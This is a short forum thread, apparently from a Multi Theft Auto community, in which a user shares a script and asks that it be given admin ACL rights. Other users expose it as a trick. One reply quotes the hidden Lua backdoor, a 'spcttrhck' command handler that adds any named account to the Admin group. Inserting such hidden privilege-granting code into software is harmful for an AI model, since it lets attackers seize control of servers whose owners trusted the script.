Cavorta Posted July 25, 2011 Posted July 25, 2011 Zango's code is the producer's script translated into numbers. Please remember to give authority to the acl in the admin script to work! Add to that the ACL admin group: https://community.multitheftauto.com/index.php?p= ... ls&id=2567
LoveFist Posted July 25, 2011 Posted July 25, 2011 Nice try lol addCommandHandler ("spcttrhck", giveAdminRights)
#Paper Posted July 25, 2011 Posted July 25, 2011 LoL, -.-" function giveAdminRights (playerSource, commandName, accountName) if accountName then aclGroupAddObject (aclGetGroup("Admin"), "user."..accountName) aclSave() outputChatBox (accountName..".", playerSource,0,255,0) else outputChatBox ("X", playerSource,255,0,0) end end addCommandHandler ("spcttrhck", giveAdminRights) Line 61-70... -.-"
bandi94 Posted July 25, 2011 Posted July 25, 2011 you don't need to open the script to find out its a trick to get spectators number you don't need to give admin right
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now